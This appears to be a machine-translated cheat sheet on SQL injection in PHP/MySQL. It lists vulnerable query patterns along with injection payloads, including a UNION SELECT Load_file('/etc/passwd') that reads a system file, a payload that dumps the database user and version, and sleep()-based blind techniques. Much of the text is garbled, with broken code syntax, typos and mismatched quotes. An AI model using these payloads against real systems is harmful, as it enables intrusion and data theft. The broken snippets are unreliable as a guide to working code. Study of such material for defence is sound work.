Common Vulnerabilities
1. Escape character Handling
$sql = "SELECT * from table where field= ' $_get[" input "]";
$result = mysql_query ($sql);
Detection method: Enter a single quotation mark '
2. Improper handling of types
$sql = "SELECT * from table where field = $_get[" userid "]"
$result = mysql_query
Common means: 1 Union all Select Load_file ('/etc/passwd ')
3. Improper assembly of query statements
$sql = "Select". $_get["Column1"]. ",". get["Column2"]. " From ". $_get[table];
$result = mysql_query ($SQL);
Detection method: Table = user & Column1=user&column2=password
4. Improper handling of errors
$getid = "Select First_name,last_name from users where user_id = ' $id '";
$result = mysql_query ($getid) or Die (' <pre> '. mysql_error (). ' </pre> ');
Detection method: 1 ' UNION SELECT 1,concat_ws (CHAR (32,58,32), User (), databse (), version ()) #
5. Improper handling of multiple submissions
if ($_get[form1] = = "Form1") {}
if (is_string ($_get["param"])) {}
if (strlen ($_get["param")) < $max {}
Means: Call a second form directly
6. Other
Common injection Methods (fiddle)
1. Get request
2. Post request
3. Other (cookie, host header site header)
Common tools
1. HP WebInspect
2. IBM Appscan
3. WVS
Simple Demo
SQL Blinds
Booleanbase
Correlation function: Left () Right ()
Timebase
Correlation function: Sleep ()
$sql = ..... where if (Condition,sleep (2), 1) ....
Errorbase
Related functions:
$sql = .... and 2*3=7 .....
Scene
MySQL Common functions
Select Left (' 1234567 ', 3)//123
Select Right (' 1234567 ', 3)//567
Select version ()//3.3.27-log
Select Database ()//db name
SQL injection attacks